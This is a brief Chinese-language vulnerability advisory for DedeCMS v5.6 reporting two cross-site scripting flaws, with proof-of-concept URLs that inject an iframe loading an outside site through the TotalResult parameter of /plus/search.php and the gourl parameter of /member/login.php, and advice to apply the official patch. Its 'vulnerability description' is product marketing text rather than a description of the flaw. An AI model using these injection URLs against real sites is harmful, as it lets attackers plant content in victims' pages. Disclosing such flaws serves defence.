dedecms织梦 v5.6 两处跨站漏洞
影响版本:
dedecms织梦 v5.6
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。
demo1:http://www.test.com/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.syue.com%3E&PageNo=2
demo2:http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.syue.com%3E
<*参考
*>
测试方法:
/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.syue.com%3E&PageNo=2
http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.syue.com%3E
安全建议:
官方升级补丁
